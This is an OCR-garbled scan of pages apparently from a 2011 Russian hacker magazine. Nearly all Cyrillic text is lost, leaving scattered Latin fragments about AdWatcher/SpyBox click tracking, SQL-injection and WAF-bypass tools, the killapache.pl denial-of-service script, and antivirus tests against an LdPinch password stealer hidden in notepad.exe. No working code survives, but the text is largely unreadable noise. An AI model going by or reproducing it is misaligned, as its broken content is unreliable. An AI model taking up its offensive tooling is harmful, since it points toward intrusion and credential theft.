n n : n , n ,

- n. n n, n . , IP n

n n n [ n n n , - ),

. n . n, SpyBox

: n n n [ 1000 ), n [ n , n , ,

n ) .

ADWATCHER SpyBox, , , . , n

, , ? Adwatcher, , SpyBox,

!

, ,

nn . , ! 2003 n , n Google 150 . , n, n

, Google Clique , n Google . , Google n,

n . , n, . , , n

2009 . Microsoft , , n Microsoft. 750 . - . , ,

.

12/155/2011

www.epidemz.net

Campaign :

Search Engine:

Group:

Landing Page:

Cost :

[x akep campaign n.ame is us~ to identify this particular ad in your reports. ihe nam e is limited in l~ngth to 32 chactl!rS ilnd numbers. For vcamplt!, an ild

in "Bob' s Monthly Ne\vslette r'' could bl! named "Bobs Ne\vs",

1 Google AdWords Selec t the sea rch eng:ine that you plan to use this 1cking link '1\ith.

L:t"=est"'------------'--'-' :: Create Grouo AdW.atch e al lo\vs you to organi ze your campiligns in different gou p s, so tha t you Cil n com pare and contrast ho\v each group parfo rms its \\'. 1/Ja

highly recommend that you use this feature , as it will help you get the most

out or th e s tatistics and reports in the lo ng run. If you do not curre.ntly h011ve: iiY groups created, or "ish to creJte differen t group, you cn Si!t one up

c:licking on "Crei te Group", The group you set up \\;11 iutomiticilly ippeir in the dropdo\vn menu \\'hti!n yo u itl! c rtta t ing yo ur next campaign.

If you Ciln nat . t ~nding Page Field or receive distribution error l make s that your rowser t.s JavScript ~bled.

Enter the URL of the \\' page you want to send your visitors to aft:er clicki ng t he idv&rtisement. This la nding paga either your

homepage or spa cial pigtt you have Sti!t up speciAca11y for thos e visitors.

Vou miy en ter multiple landing pages and th e percentage of traffi c you wish

to sent to each one of them to te.st \\'hi ch one converts better to sales or

actions. See ouffeatures page for more details.

~ Per Click GJ Select the type of the campiign; that is, \\lhether it 's Per Cli ck, Aat

fee. mon thly ite , e tc. This select ion is needed for eilculting your future expenses.

xakep.ru

. - [ IP) [ , , , , , ).

[ ) 3D- . , faud ts ,

. ,

, [ , ) :

document.write( ' ' );

, . Adwatche 30

. , , ,

, Adwatche SpyBox.

12/155/2011

: AdSense

Q.ulc:kNo~viptlon

> newco~mplicn

Welcome to AdWatcher Oashoard Welcome Demo. Today you h~Ve recefved: 110 clkks, actions, d Oles.

> oveMew reporb >nlturo~treports

> financio~lrepots > fro~udreports

;.!\~. 9.~! .Q!fiC)~ ~!!IJ. Q~!d.ll! .I?!P..~!!~~'!C:.~!'!'~!~t-.11.

General lnformat ion

'~tiiCim~lls" = Hul N1ntr1l Clm~;n 7ot11Frludll.por.s

- Adwatcher

19

36

Octoer Stat istics: (12) Cliclui : (2) A.ctions :

{45) SJI :

Polit:

t...A..NLJIA 68,42 "!

(7676] JJ

[] (6312.28 ]

(0.00] {6312.28]

{100]

__ 00:03:18 .

, Google Analytics

, : Google Analyti cs Piwik [ -, ). , ,

, . : , ,

. , ,

[ 40 , ), ,

. > . ,

. , , -

. , - . ,

, .

, [ , ) .

,

. , , , , , :). I

081

www.epidemz.net

Mar licq 884888, http://snipper.rul

amw.. II HOII. I.I!O.If t-.ol ... o I.IIO::OIL:I:O.tt

n-- ......... __

D-1t.1 .............. I . ..,...W IOI0101l,IIO!, >,

ei'O------. . ~ . ..__....,, .... _.... _ .. -.

-------

-

1 -~~==:~ -----.........

: 54luR4

URL: il lylpxtMKi

: 'nix/win

: Gremwell

URL: www gremwell com

: nix/win

- , n , ,

m? n ? ,

MagicTee. n n n .

IWAF, Acuetix, OpeVAS, Nessus, u, m . .), n n

!n, m ikto) IHTML, MS Wod .) .

!) ,

, Magic !)- n n , n

n ,

. n n ,

n n , www.gemwell . com/ documetatio .

12/155/2011

ALANA K!LLR , n

- Apache l bit.ly/gvHB i ), , n . n

n , n , n

t l K!LLR

S4luR4 n n -. n n , n

n. , n

: Danijel MaXoNe URL:

it ly/orsgKn

: Windows 2000/

/2003 Server/ Vista/2008 Server/7

/

n/- / n SQL-oa, n MaxSQLi Sytax Builde, n SQL-. n SQLi,

n based. :

; n

UNION; WAF n ;

; ;

n ;

n; , ;

n stig itege based.

, n , n , , n ,

n SQL-.

X-Tools

killapache.pl Kigcope. n -- , n

. S4luR4 + cURL l , n !, , . .).

: G-

lbyte gs) , n n.

: VaZoNeZ

URL: yazonez com/(;lage/

-- --

.llig.an.Q -t~

: Windows 2000//2003 Server/ Vista/2008 Server/7

n , n ,

. , ,

n . nn n Stegao, .

n , : 1.

-

. , ,

- ,

. - .

notepad2.exe J

" w n "0-m - ~ ~1*1

Kpaw

, , . , - , -. ;1.

, -. n

, . .

, , ,

-, . .

, , . ,

. ,

.

1. Kaspersky Crystal . . Kaspesky Cystal-

-

- - i" Dr Web Scanner FLY-CODE, , , .

3. ESET NOD32 Smart Security 5. - ESET NOD32 Smat Secuity 5. ,

.. , , >,

. 4. Avast! Free Antivirus.

- Avast! F Antivius. n, ,

.

n n

. , . - n .

, n n n .

n. n , API, n

, n , .

,

n LL-. , ,

. , .

Pinch. - ,

. Toja-PSW.Wi32.LDPinch.dlt, D. Web- Tojan.Packed . 1197, NOD32- Win32/PSW.LdPinch.NMJ, Avast , Win32:LdPinch-NO [j]. ,

n otepad.exe. , .

ii:Wi~ .

MZ- -, . - - otepad.exe. - , ,

I- .

Kaspesky Cistal. - . > . NOD32 Smat Secuity , Win32/PSW.LdPinch.NMJ.

Avast , , .